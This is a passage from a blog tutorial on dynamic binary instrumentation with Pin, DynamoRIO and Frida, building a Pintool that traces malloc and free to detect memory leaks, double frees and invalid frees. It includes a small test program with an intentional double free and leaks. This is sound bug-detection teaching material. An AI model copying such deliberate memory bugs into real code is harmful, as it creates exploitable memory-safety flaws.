We can also integrate DynamoRIO with Visual Studio, exactly the same way we did with Pin. Since the setup process is exactly the same, I’ll only leave the screenshot below and you can figure out how to do the rest.

Frida

Frida is a DBI framework developed mainly by Ole. It became very popular among the “mobile” community and gained a considerable group of contributors (it is now sponsored by NowSecure). Frida supports OSX, Windows, Linux, and QNX, and has an API available for multiple languages, like Python, C#, Swift, Qt/QML and C. Just like the DBI frameworks mentioned above, we can use Frida together with scripts to monitor, modify, and record the behavior of a program while it is running.

Frida is free (free as in free beer) and is very easy to install (see below). There are also many usage examples online that we can use to get started. Frida injects Google’s V8 engine into a process. Then, Frida core communicates with Frida’s agent (process side) and uses the V8 engine to run the JavaScript code (creating dynamic hooks).

Frida’s API has two main parts: the JavaScript API and the bindings API. I didn’t dive too deep into them and just used what I believe is the most popular one, the JavaScript API.
I found it easy to use, very flexible, and I could use it to quickly write some introspection tools.

Even though Pin and DynamoRIO are the “main” DBI frameworks, and the most mature, Frida has some advantages. As mentioned above, it has bindings for more languages, and rapid tool development is a reality. It also has some disadvantages: less maturity, less documentation, less granularity than other frameworks, and consequently a lack of some functionality.

Frida setup (Windows)

Frida’s setup is very easy. Just download https://bootstrap.pypa.io/get-pip.py and then run:

    python get-pip.py

And, to actually install Frida, type the following.

    cd\
    cd Python27\Scripts
    pip.exe install frida

And that’s it, you are ready to go. Yes, you have to install Python before the steps above. However, I don’t know anyone who doesn’t have Python installed, so I just assume it’s already there.

Generic DBI usage

Before diving into some code, I’ll try to document in this section generic ways of using some of the DBI frameworks I mentioned before. More precisely, Pin and DynamoRIO.

As mentioned before, the most common execution mode in a DBI system is the JIT (just-in-time compiler) mode. The JIT compiler creates a modified copy of chunks of instructions just before executing them, and these are cached in memory. This mode of execution is the default in most of the DBI frameworks I had a look at, and is also generally accepted as the most robust execution model.

Also, as mentioned before, there are two main methods to control the execution of a program. The first is to run the entire program under the control of the DBI framework. The second is to attach to a program already running, just like a debugger.

Below is the standard way to run a program under the control of a DBI system. Our target/guest application is not directly launched from the command line. Instead, it is passed as an argument to the DBI system.
The DBI system initializes itself, then launches the program under its control and modifies it according to the plug-in. The plug-in contains the actual user-defined code, that is, our instrumentation code. On Pin the plug-in is called a Pintool, on DynamoRIO it’s called a client, and on Frida I believe it’s simply called a script.

PIN JIT mode.

    pin.exe <pin args> -t <pintool>.dll <pintool args> -- target_program.exe <target_program args>

PIN Probe mode.

    pin.exe -probe <pin args> -t <pintool>.dll <pintool args> -- target_program.exe <target_program args>

DynamoRIO JIT mode.

    drrun.exe -client <dynamorio client>.dll 0 "" target_program.exe <target_program args>

DynamoRIO Probe mode.

    drrun.exe -mode probe -client <dynamorio client>.dll 0 "" target_program.exe <target_program args>

As we can see above, the way we launch Pin and DynamoRIO is not that different. On Linux systems, it’s pretty much the same (yes, remove the .exe, replace the .dll with .so, and that’s it).

Obviously, there are many other options that can be passed on the command line besides the ones shown above. For a full list check the help/man pages. Above are just the required options, for reference.

Frida is a bit different, and we’ll see ahead how to use it.

If you want to attach to a running process, you can do it with Pin. However, as of today, attaching to a process with DynamoRIO is not supported. There are, though, two methods of running a process under DynamoRIO in Windows. You can read more about it here.

With Pin you can simply attach to a process by using the -pid argument as shown below.

    pin.exe -pid <target pid> <other pin args> -t <pintool>.dll <pintool args>

User defined modifications

Regardless of the DBI we are using, each DBI framework provides an API that we can use to specify how we modify the target/guest program.
The abstraction introduced by the API is used together with code usually written in C or C++ (or even JavaScript, or Swift, in the case of Frida) to create a plug-in (in the form of a shared library, as we saw above) which will then be “injected” into the running target/guest program by the DBI system. It will run in the same address space as the target/guest program.

This means that in order to use a DBI system, we need not only to know how to launch a target/guest program, as illustrated above, but also to be familiar with and understand the API exported by the framework we want to use.

Unfortunately, the APIs of these multiple frameworks are very different. However, as we will see, the general concepts apply to most of them. As I mentioned before, I’ll be focusing mainly on Pin. I’ll also try to recreate more or less the same functionality with DynamoRIO and Frida, so we will also get a bit familiar with their APIs. Note that the API coverage won’t be by any means extensive. I advise you to check each DBI framework’s API documentation if you want to know more. By following this post you’ll simply get a sense of what’s available in the API, possibly limited to the use case scenario I chose.

The idea behind any API is to hide the complexity of certain operations from the user, without removing any power to perform any task (including complex tasks). We can usually say that the easier the API is to use, the better it is.

All the APIs allow us to, in a certain way, iterate over the instructions the DBI system is about to run. This allows us to add, remove, modify, or observe the instructions prior to executing them. For example, my initial idea was to simply log (observe) all the calls to memory related functions (malloc and free).

We can not only introduce instructions to get profiling/tracing information about a program, but also introduce complex changes, to the point of completely replacing certain instructions with a completely new implementation.
Think, for example, of replacing all the malloc calls with your own malloc implementation (that, for example, introduces shadow bytes and so on).

In Pin, most of the API routines are call based (in DynamoRIO it’s slightly different). This makes the API very user-friendly, at least for the way I think when I visualize the usage of a DBI system. This is also possible with DynamoRIO, obviously, as we will see. Basically, we register a callback to be notified when certain events occur (a call to malloc, for example). For performance reasons, Pin inlines these callbacks.

As we saw, most of the DBI frameworks support multiple operating systems and platforms. Most of the time, the APIs are the same and all the differences between operating systems are kept away from the user and handled “under the table”. However, there are still certain APIs that are specific to certain operating systems. You need to be aware of that.

It’s also important to distinguish between instrumentation and analysis code. Instrumentation code is applied to specific code locations, while analysis code is applied to events that occur at some point in the execution of the program. As stated on Wikipedia:

“Instrumentation routines are called when code that has not yet been recompiled is about to be run, and enable the insertion of analysis routines. Analysis routines are called when the code associated with them is run.”

In other words, instrumentation routines define where to insert instrumentation. Analysis routines define what to do when the instrumentation is activated.

The APIs of Pin, DynamoRIO, and Frida allow us to iterate over the target/guest program at different levels of granularity. That is, we can iterate over every single instruction (just before it executes), entire basic blocks, traces (multiple basic blocks), or the entire target/guest program (image).
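To make the instrumentation/analysis split described above a bit more concrete, here is a toy model in plain C++. It does not use Pin, DynamoRIO, or Frida, and every name in it (ToyDbi, instrument, execute, runTrace) is made up for illustration. It only mimics the idea that an instrumentation routine runs once per piece of code, the first time that code is seen, while the analysis routine it attaches runs every time that code executes.

```cpp
#include <functional>
#include <map>
#include <string>
#include <utility>
#include <vector>

// Toy stand-in for a DBI code cache: block name -> analysis callbacks.
// Hypothetical names only; this is not how any real framework is built.
struct ToyDbi {
    std::map<std::string, std::vector<std::function<void()>>> cache;
    int instrumentCalls = 0;  // how often the instrumentation routine ran
    int analysisCalls = 0;    // how often an analysis routine ran

    // Instrumentation routine: decides WHERE to attach analysis code.
    // It runs once per block, the first time the block is about to run.
    void instrument(const std::string& block) {
        ++instrumentCalls;
        std::vector<std::function<void()>> hooks;
        if (block == "malloc")
            hooks.push_back([this] { ++analysisCalls; });  // analysis routine
        cache[block] = hooks;
    }

    // "Execute" a block: instrument it on first sight, then run the
    // attached analysis routines on every execution.
    void execute(const std::string& block) {
        if (cache.find(block) == cache.end())
            instrument(block);
        for (auto& hook : cache[block])
            hook();
    }
};

// Replays a trace of block names and returns
// {instrumentation calls, analysis calls}.
std::pair<int, int> runTrace(const std::vector<std::string>& trace) {
    ToyDbi dbi;
    for (const auto& block : trace)
        dbi.execute(block);
    return {dbi.instrumentCalls, dbi.analysisCalls};
}
```

Calling runTrace({"main", "malloc", "malloc", "puts", "malloc", "malloc"}) returns {3, 4}: three distinct blocks were instrumented once each, while the analysis routine attached to malloc ran on each of its four executions.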
Example tool

As I mentioned, while I was playing with Heap Spraying I felt the need to log all the memory allocations my code was performing. Since I felt a bit annoyed after doing this repeatedly with WinDbg, even with some automation, I thought about doing it with a DBI framework. More precisely, with Pin.

I remember that during one of Peter Van Eeckhoutte’s exploitation classes he mentioned he had written something similar. I looked at his GitHub and found his Pintool. I had a look at his code, but since he used Visual Studio 2012, plus an old version of Pin, plus a different approach from what I had in mind, plus a different goal (I had in mind doing something else besides logging memory allocations), and things changed a bit since then… I decided to write my own Pintool instead of using, or modifying, his code. After all, it’s all about struggling and learning. Not running tools. Later I realized that most of his code comes from the Pin documentation, and so does mine.

The goal was to write a Pintool, or a DynamoRIO client, and use it to detect critical memory issues, such as memory leaks and double frees. Yes, in C/C++ programs. You may say that there are plenty of tools that already allow you to do that, and that’s probably true (in fact DynamoRIO comes with a couple of tools that can help here). The point here was to learn how to write my own tool, have fun, get familiar with DBI frameworks, and document my experiments for later reference. Hopefully, it will also be used as a soft introduction to Dynamic Binary Analysis by people who don’t know where to start.

So, the “critical memory issues” I had in mind weren’t really that difficult to trace. After looking at some almost ready-to-go code samples I found in Pin’s documentation, I ended up expanding a bit the initial logging goal I had in mind, and added a couple of “features” to aid my vulnerability discovery capabilities.
As you know, some common memory (de)allocation problems in C/C++ programs are:

- Memory leaks
- Double frees
- Invalid frees
- Use after frees. Note, I’m not detecting these at the moment. It’s tricky, even if it looks easy at first. I’ll add this feature at some point, but it requires a bit more engineering and testing.

I assume everyone knows what the problems listed above are. If you don’t, or you need a ‘refresh’, just click the links above.

At least the first 3 problems are very “easy” to detect with a Pintool, or a DynamoRIO client. I’ll make a couple of assumptions. The target program is a single binary/executable file, and the only functions that I’ll track to allocate and free memory are malloc and free (calloc and realloc are just “special” versions of malloc anyway). Internally new and delete use malloc and free, so we are covered. I can simply “monitor” these calls. I won’t consider other functions like realloc, calloc, HeapAlloc, HeapFree, etc. (for now). Yes, for now, I’ll focus only on the generic malloc and free functions from the C Run-Time Library. In Windows, these functions, when called, will then call HeapAlloc and HeapFree.

Here’s a diagram showing the relationship of Windows API calls used to allocate process memory (from the book The Art of Memory Forensics, and used with authorization. Thanks to Andrew Case).

As we can see above, ideally we should actually be “monitoring” RtlAllocateHeap and RtlFreeHeap. However, we can ignore this for now. This way, if you just want to try this code in Linux, or OSX, it’s mostly copy and paste. Later, in the main version of this tool, I’ll indeed be working only with the Windows Heap functions, or my Pintool won’t work with Internet Explorer, for example.

Whenever a program calls malloc, I’ll log the return value (that is, the address of the allocated memory region). Whenever a program calls free, I’ll match the address being freed with the addresses I saved before.
If it has been allocated and not freed, I’ll mark it as freed. If it has been allocated and already freed, then we have a double free. If I have no record of that address having been allocated before, then we have a free of unallocated memory. Simple, huh? Finally, when the program exits, I can look at my records to detect memory addresses that have been allocated but not freed. This way I can also detect memory leaks.

As we’ll see, using a dynamic binary framework to achieve what’s described above can be done with very little effort. However, there are some issues that we’ll ignore to keep this post simple. As you can probably guess, the Heap Manager also plays a role here, and our tool might have to be Heap Manager specific if we don’t want to be flooded with false positives.

Also, as mentioned before, this tool will tell us there’s a bug, but not exactly where. You can tell your tool to break/pause when an issue is found and attach a debugger. However, depending on the class of bug, it may still be very hard to find where the bug is and reproduce it.

While I was writing this blog post, a very interesting tool from Joxean Koret called membugtool was released during the EuskalHack 2018 conference. His tool does a bit more than mine (well, actually considerably more), and the code is certainly better than mine. Keep following this post if you want to learn more about Pin and other DBI frameworks, but don’t forget to check his tool later. I was actually very happy when I saw it released because it means my idea wasn’t complete nonsense. On top of that, Joxean Koret is a respected researcher that I’ve been following for quite a long time, mainly due to his awesome work on breaking Antivirus engines.

Target/Guest program (ExercisePin.exe)

To test our multiple dynamic binary analysis tools, I wrote the following nonsense program (I called it ExercisePin.exe).
It’s quite clear that there are some memory leaks, an invalid free (the free(NULL) call, which standard C defines as a no-op but which our tool will still flag), and a potential double free (depending on our input).

    #include <stdio.h>
    #include <stdlib.h>

    void do_nothing() {
        int *xyz = (int*)malloc(2);   /* never freed: leak */
    }

    int main(int argc, char* argv[]) {
        free(NULL);                   /* free of an address we never allocated */

        do_nothing();

        char *A = (char*)malloc(128 * sizeof(char));
        char *B = (char*)malloc(128 * sizeof(char));   /* never freed: leak */
        char *C = (char*)malloc(128 * sizeof(char));

        free(A);
        free(C);

        if (argc != 2)
            do_nothing();
        else
            free(C);                  /* double free when one argument is passed */

        puts("done");
        return 0;
    }

As you can see, it’s a very stupid program. I recommend you test your tools with real software and see how they behave. Also, check the previously mentioned project membugtool, since it includes a very nice set of tests, which actually made me lazy: I didn’t even try to improve the code above or create new sample buggy programs. Depending on which compiler you use to build this sample, you might have different results. I built mine with Visual Studio. It has advantages, and disadvantages. If you prefer, you can use Dev-C++ (which uses GCC), or cygwin (and install gcc or i686-w64-mingw32-gcc.exe), or even Embarcadero. Anyway, expect different results depending on the compiler you choose to build the target program.

Basic Pintool (MallocTracer)

In this first Pintool example, I’m logging all the malloc and free calls. The instrumentation is added before and after the malloc call and logs the parameter passed to the call and its return value. For the free call we’ll only look at its parameter, and not at its return value. So the instrumentation is only added before the call. This Pintool will not be very useful in big applications since it doesn’t really tell you where the issue is. Anyway, it is a good start and will serve the purpose of “showing” how the Pin API can be used.

We need to start by choosing which instrumentation granularity we’ll use. Have a look at the documentation for more details. I’ll be using Image instrumentation.
Image instrumentation lets the Pintool inspect and instrument an entire image, IMG, when it is first loaded. A Pintool can walk the sections, SEC, of the image, the routines, RTN, of a section, and the instructions, INS, of a routine. Instrumentation can be inserted so that it is executed before or after a routine is executed, or before or after an instruction is executed. Image instrumentation utilizes the IMG_AddInstrumentFunction API call. Image instrumentation depends on symbol information to determine routine boundaries, hence PIN_InitSymbols must be called before PIN_Init.

We start with some includes. To use the Pin API we need to include pin.h.

    #include "pin.h"
    #include <iostream>
    #include <fstream>
    #include <map>

The iostream header is required for basic input/output operations, and the fstream header is required because I’ll write the output of my Pintool to a file. In small programs, we could live with the console output; however, for big programs we need to save the output to a file. If you are instrumenting Internet Explorer, for example, and playing with some JavaScript code, the amount of malloc and free calls is impressive (well, RtlAllocateHeap and RtlFreeHeap). In some big programs you might not even want to write to disk every time there’s a call, for performance reasons, but let’s ignore that to keep things simple.

Additionally, I’ll use a map container to keep a log of all the memory allocated and freed. Check the References section to see how the C++ map container “works” if you aren’t used to writing code in C++. I’m not a developer, so my code can be a bit scary, but hopefully it works. Consider yourself warned.

I’ll also have some global variables. It’s very common to use global variables in a Pintool; have a look at the samples provided to get a feeling of how they are most commonly used. In my case, I’ll use the following global variables.
    map<ADDRINT, bool> MallocMap;
    ofstream LogFile;
    KNOB<string> LogFileName(KNOB_MODE_WRITEONCE, "pintool", "o", "memprofile.out", "Memory trace file name");

I already mentioned the map container above; again, have a look here if you don’t know how it works. The idea is to store in this MallocMap the state of each allocation. The ADDRINT type is defined in pin.h and, as you can guess, represents a memory address. It will be mapped to a bool value. If the bool value is set to true, it means the memory has been deallocated.

The LogFile is the output file where I’ll save the output of the Pintool. Lastly, the KNOB variable. It is basically a switch supported by our Pintool (a way to pass command line arguments to our Pintool). This KNOB allows us to specify the name of the log file through the “o” switch. Its default value is “memprofile.out”.

If we look at the main function of the code samples, we’ll see that they are all very similar. And the one below is no exception.

    int main(int argc, char *argv[])
    {
        PIN_InitSymbols();
        PIN_Init(argc, argv);
        LogFile.open(LogFileName.Value().c_str());
        IMG_AddInstrumentFunction(CustomInstrumentation, NULL);
        PIN_AddFiniFunction(FinalFunc, NULL);
        PIN_StartProgram();
        return 0;
    }

I have to call PIN_InitSymbols before PIN_Init because I’m using Image instrumentation, which depends on symbol information. Then I open the log file for writing, and I call IMG_AddInstrumentFunction. The instrumentation function that I’ll be using is called CustomInstrumentation and is defined by me (it’s not a Pin API function). You can call it whatever you want.

Then I have to call PIN_AddFiniFunction, which registers a function to be executed immediately before the application exits. In this case, my function is FinalFunc.

Finally, I call PIN_StartProgram to start executing my program. This function never returns.

So let’s have a look at my CustomInstrumentation() function.
    VOID CustomInstrumentation(IMG img, VOID *v)
    {
        for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym))
        {
            string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY);

            if (undFuncName == "malloc")
            {
                RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));

                if (RTN_Valid(allocRtn))
                {
                    RTN_Open(allocRtn);

                    // Record Malloc size
                    RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc,
                        IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);

                    // Record Malloc return address
                    RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc,
                        IARG_FUNCRET_EXITPOINT_VALUE, IARG_END);

                    RTN_Close(allocRtn);
                }
            }
            else if (undFuncName == "free")
            {
                RTN freeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));

                if (RTN_Valid(freeRtn))
                {
                    RTN_Open(freeRtn);

                    RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree,
                        IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);

                    RTN_Close(freeRtn);
                }
            }
        }
    }

We need to “tell” Pin what the instrumentation routines are, and when to execute them. The instrumentation routine above is called every time an image is loaded, and in it we also “tell” Pin where to insert the analysis routines. Basically, above, when we find the malloc or free routine we insert the analysis routines by using the RTN_InsertCall function.

RTN_InsertCall accepts multiple arguments, a variable number of arguments actually. Three are quite important, and you can easily guess which ones by looking at these calls. The first is the routine we want to instrument. The second is an IPOINT that determines where the analysis call is inserted relative to the instrumented object. And the third is the analysis routine to be inserted.

Also, note that all RTN_InsertCall calls must be preceded by a call to RTN_Open and followed by a call to RTN_Close.

We can specify a list of arguments to be passed to the analysis routine, and this list must be terminated with IARG_END.
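As a mental model only, the effect of the IPOINT_BEFORE and IPOINT_AFTER insertions above can be pictured as a wrapper that calls one function with the routine’s first argument before it runs and another with its return value after it returns. The sketch below is plain C++ with made-up names (RoutineHooks, hookedMalloc, traceOneAllocation). It is not Pin code, and Pin does not work by wrapping functions like this: it rewrites the code it is about to execute. The sketch only shows what the analysis routines get to see.

```cpp
#include <cstddef>
#include <cstdlib>
#include <functional>
#include <string>
#include <vector>

// Hypothetical stand-ins for the analysis routines attached to a routine.
struct RoutineHooks {
    std::function<void(std::size_t)> before;  // sees argument 0 on entry
    std::function<void(void*)> after;         // sees the return value on exit
};

// Models "malloc with instrumentation": run the before hook, call the real
// routine, then run the after hook with whatever it returned.
void* hookedMalloc(std::size_t size, const RoutineHooks& hooks) {
    if (hooks.before) hooks.before(size);
    void* p = std::malloc(size);
    if (hooks.after) hooks.after(p);
    return p;
}

// Performs one allocation under the hooks and returns what they logged.
std::vector<std::string> traceOneAllocation(std::size_t size) {
    std::vector<std::string> log;
    RoutineHooks hooks;
    hooks.before = [&log](std::size_t n) {
        log.push_back("before: size=" + std::to_string(n));
    };
    hooks.after = [&log](void* p) {
        log.push_back(p ? "after: non-null" : "after: null");
    };
    void* p = hookedMalloc(size, hooks);
    std::free(p);  // free(NULL) is a no-op, so this is safe either way
    return log;
}
```

Calling traceOneAllocation(128) yields two log entries, the first one written before the allocation happens and the second one after it returns. That is the same ordering the Pintool relies on when it logs the size first and the returned address second.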
As we can also guess by looking at the Pintool code, to pass the return value of malloc to the analysis routine we use IARG_FUNCRET_EXITPOINT_VALUE. To pass the argument of the malloc or free calls to the analysis routine, we use IARG_FUNCARG_ENTRYPOINT_VALUE followed by the index of the argument. In our case, both are 0 (first and only argument).

All the Pin functions that operate at the routine level start with RTN_. Have a look at the RTN Routine Object documentation here.

Also, all the Pin functions that operate at the image level start with IMG_. Have a look at the IMG Image Object documentation here.

The same applies to all the Pin functions that operate at the symbol level; they all (or almost all) start with SYM_. Have a look at the SYM Symbol Object documentation here.

You might be wondering how Pin finds malloc and free. Pin will use whatever symbol information is available: debug symbols from the target/guest program if available, PDB files if available, export tables, and dbghelp. There are two possible methods to instrument our functions. We can use RTN_FindByName, or alternatively walk the symbols ourselves, handling name mangling and multiple symbols (the method I used), as shown below.

    for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym))
    {
        string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY);

        if (undFuncName == "malloc") // find the malloc function

After we find the routines we want to instrument (malloc and free in our example), we “tell” Pin which function must be called every time a malloc call is executed.

    // Record Malloc size
    RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc,
        IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);

    // Record Malloc return address
    RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc,
        IARG_FUNCRET_EXITPOINT_VALUE, IARG_END);

If we look at the code above, we have two calls to RTN_InsertCall. In the first, we “tell” Pin which function must be called before the malloc call.
In the second we “tell” Pin which function must be called after the malloc call. We want to log the allocation sizes and the return value of the malloc call. So, we need both.

For the free call, we are only interested in its parameter (the address of the memory to free).

    RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree,
        IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);

These three functions are very straightforward. First, before the malloc call we just want to save the size of the memory being allocated.

    VOID LogBeforeMalloc(ADDRINT size)
    {
        LogFile << "[*] malloc(" << dec << size << ")";
    }

After the malloc call, we just want to save the returned address. However, as we can see below, we use the map container and, by using an iterator, we check if the chunk of memory is being allocated for the first time. If yes, we also log it.

    VOID LogAfterMalloc(ADDRINT addr)
    {
        if (addr == NULL)
        {
            cerr << "[-] Error: malloc() return value was NULL. Heap full!?!";
            return;
        }

        map<ADDRINT, bool>::iterator it = MallocMap.find(addr);

        if (it != MallocMap.end())
        {
            if (it->second)
                it->second = false; // Address reused after a free: mark it as allocated again
            else
                cerr << "[-] Error: allocating memory not freed!?!" << endl;
        }
        else
        {
            MallocMap.insert(pair<ADDRINT, bool>(addr, false));
            LogFile << "\t\t= 0x" << hex << addr << endl;
        }
    }

Finally, when we free a chunk of memory we verify if that address was already freed, to detect double frees. Plus, if we don’t know the address being freed, then we are trying to free memory that wasn’t allocated before, which can lead to undefined behavior.

    VOID LogFree(ADDRINT addr)
    {
        map<ADDRINT, bool>::iterator it = MallocMap.find(addr);

        if (it != MallocMap.end())
        {
            if (it->second)
                LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once." << endl; // Double free
            else
            {
                it->second = true; // Mark it as freed
                LogFile << "[*] free(0x" << hex << addr << ")" << endl;
            }
        }
        else
            LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl; // Freeing unallocated memory
    }

Lastly, we have the call to FinalFunc, which is executed just before the program ends. We basically verify if there’s memory that has been allocated but not freed, and we close our log file. The return of this function marks the end of the instrumentation.

    VOID FinalFunc(INT32 code, VOID *v)
    {
        for (pair<ADDRINT, bool> p : MallocMap)
        {
            if (!p.second)
                LogFile << "[*] Memory at address 0x" << hex << p.first << " allocated but not freed" << endl;
        }

        LogFile.close();
    }

Simple.

The whole Pintool code is below. You can also get the whole Visual Studio project from GitHub here.

    // Built on top of https://software.intel.com/sites/default/files/managed/62/f4/cgo2013.pdf (slide 33)

    #include "pin.h"
    #include <iostream>
    #include <fstream>
    #include <map>

    // Allocation state per address: false = allocated, true = freed
    map<ADDRINT, bool> MallocMap;
    ofstream LogFile;
    KNOB<string> LogFileName(KNOB_MODE_WRITEONCE, "pintool", "o", "memprofile.out", "Memory trace file name");

    // Analysis routine: runs after malloc returns, receives its return value
    VOID LogAfterMalloc(ADDRINT addr)
    {
        if (addr == NULL)
        {
            cerr << "[-] Error: malloc() return value was NULL. Heap full!?!";
            return;
        }

        map<ADDRINT, bool>::iterator it = MallocMap.find(addr);

        if (it != MallocMap.end())
        {
            if (it->second)
                it->second = false; // Address reused after a free: mark it as allocated again
            else
                cerr << "[-] Error: allocating memory not freed!?!" << endl;
        }
        else
        {
            MallocMap.insert(pair<ADDRINT, bool>(addr, false));
            LogFile << "\t\t= 0x" << hex << addr << endl;
        }
    }

    // Analysis routine: runs before malloc, receives the requested size
    VOID LogBeforeMalloc(ADDRINT size)
    {
        LogFile << "[*] malloc(" << dec << size << ")";
    }

    // Analysis routine: runs before free, receives the address being freed
    VOID LogFree(ADDRINT addr)
    {
        map<ADDRINT, bool>::iterator it = MallocMap.find(addr);

        if (it != MallocMap.end())
        {
            if (it->second)
                LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once." << endl; // Double free
            else
            {
                it->second = true; // Mark it as freed
                LogFile << "[*] free(0x" << hex << addr << ")" << endl;
            }
        }
        else
            LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl;
    }

    // Instrumentation routine: called once for every image that is loaded
    VOID CustomInstrumentation(IMG img, VOID *v)
    {
        for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym))
        {
            string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY);

            if (undFuncName == "malloc")
            {
                RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));

                if (RTN_Valid(allocRtn))
                {
                    RTN_Open(allocRtn);

                    // Record Malloc size
                    RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc,
                        IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);

                    // Record Malloc return address
                    RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc,
                        IARG_FUNCRET_EXITPOINT_VALUE, IARG_END);

                    RTN_Close(allocRtn);
                }
            }
            else if (undFuncName == "free")
            {
                RTN freeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));

                if (RTN_Valid(freeRtn))
                {
                    RTN_Open(freeRtn);

                    RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree,
                        IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);

                    RTN_Close(freeRtn);
                }
            }
        }
    }

    // Called just before the target exits: report leaks and close the log
    VOID FinalFunc(INT32 code, VOID *v)
    {
        for (pair<ADDRINT, bool> p : MallocMap)
        {
            if (!p.second)
                LogFile << "[*] Memory at address 0x" << hex << p.first << " allocated but not freed" << endl;
        }

        LogFile.close();
    }

    int main(int argc, char *argv[])
    {
        PIN_InitSymbols();
        PIN_Init(argc, argv);
        LogFile.open(LogFileName.Value().c_str());
        IMG_AddInstrumentFunction(CustomInstrumentation, NULL);
        PIN_AddFiniFunction(FinalFunc, NULL);
        PIN_StartProgram();
        return 0;
    }

If you run it against our ExercisePin.exe binary (see the section Target/Guest Program), you get the following.

    C:\pin>pin -t c:\pin\source\tools\MallocTracer\Release\MallocTracer.dll -- ExercisePin.exe
    done
    C:\pin>type memprofile.out
    [*] Freeing unallocated memory at address 0x0.
[*] malloc(2) = 0x564f68
[*] malloc(128) = 0x569b88
[*] malloc(128) = 0x569c10
[*] malloc(128) = 0x569c98
[*] free(0x569b88)
[*] free(0x569c98)
[*] malloc(2) = 0x564e78
[*] Memory at address 0x564e78 allocated but not freed
[*] Memory at address 0x564f68 allocated but not freed
[*] Memory at address 0x569c10 allocated but not freed

Or, if we pass any data as an argument to our ExercisePin.exe…

C:\pin>pin.exe -t "C:\pin\source\tools\MallocTracer\Release\MallocTracer.dll" -- C:\TARGET\ExercisePin.exe moo
C:\pin>type memprofile.out
[*] Freeing unallocated memory at address 0x0.
[*] malloc(2) = 0x214f78
[*] malloc(128) = 0x218f98
[*] malloc(128) = 0x219020
[*] malloc(128) = 0x2190a8
[*] free(0x218f98)
[*] free(0x2190a8)
[*] Memory at address 0x2190a8 has been freed more than once (Double Free).

As we can see above, our Pintool was able to identify all the issues we were aware of in our test case, that is, an invalid free, memory leaks, and a double free. We don’t see the memory leaks in the last output because our binary crashes when the double free happens. The binary was built with Visual Studio, which adds some heap integrity checks and makes it crash. If you build ExercisePin.exe with gcc, or another compiler, the double free won’t be noticed and the program will keep running. However, if you build it with gcc, for example, you’ll see many other malloc and free calls from the C Run-Time Library initialization code. Hence, I didn’t use gcc, to keep the output easier to follow.

Basic DynamoRIO client (MallocWrap)

We’ll create a DynamoRIO client that mimics the Pintool above. That is, we’ll log all the malloc and free calls. In the same way, the instrumentation is added before and after the malloc call, since we want to log the parameter passed to the call and its return value. For the free call, we’ll only look at its parameter, and not at its return value, so the instrumentation is only added before the call.
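Since this client is meant to mimic the Pintool, it can help to see the Pintool’s bookkeeping in a form that doesn’t depend on any DBI framework. Below is a minimal sketch in plain C++. The HeapTracker class and its method names are my own assumptions for illustration and are not part of Pin or DynamoRIO. It keeps the same kind of map (address to “freed” flag) and classifies each free as valid, double free, or unknown address.

```cpp
#include <cstdint>
#include <map>
#include <vector>

// Hypothetical, framework-independent version of the Pintool's bookkeeping.
// Each address returned by an allocator maps to "true" once it has been freed.
class HeapTracker {
public:
    enum class FreeResult { Ok, DoubleFree, Unknown };

    // Record an address returned by an allocation call.
    void on_alloc(std::uintptr_t addr) {
        if (addr == 0) return;   // failed allocation, nothing to track
        freed_[addr] = false;    // new chunk, or a freed chunk being reused
    }

    // Classify a free of addr and update the state.
    FreeResult on_free(std::uintptr_t addr) {
        auto it = freed_.find(addr);
        if (it == freed_.end()) return FreeResult::Unknown;  // never allocated
        if (it->second) return FreeResult::DoubleFree;       // already freed
        it->second = true;                                   // mark it as freed
        return FreeResult::Ok;
    }

    // Addresses that were allocated but never freed, in ascending order.
    std::vector<std::uintptr_t> leaks() const {
        std::vector<std::uintptr_t> out;
        for (const auto &entry : freed_)
            if (!entry.second) out.push_back(entry.first);
        return out;
    }

private:
    std::map<std::uintptr_t, bool> freed_;
};
```

Fed with the addresses from the first log above, on_free(0) comes back as Unknown and leaks() returns the chunks that were never freed. Note that, like the Pintool, this sketch flags free(NULL), even though the C standard defines it as a no-op.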
We’ll use the drwrap DynamoRIO extension, which provides function wrapping and replacing support. drwrap uses the drmgr extension to ensure its events occur in the proper order. We start with some “standard” includes, and to use the DynamoRIO APIs we need to include dr_api.h.

#include "stdafx.h"
#include <fstream>
#include "dr_api.h"
#include "drmgr.h"
#include "drwrap.h"
using namespace std;

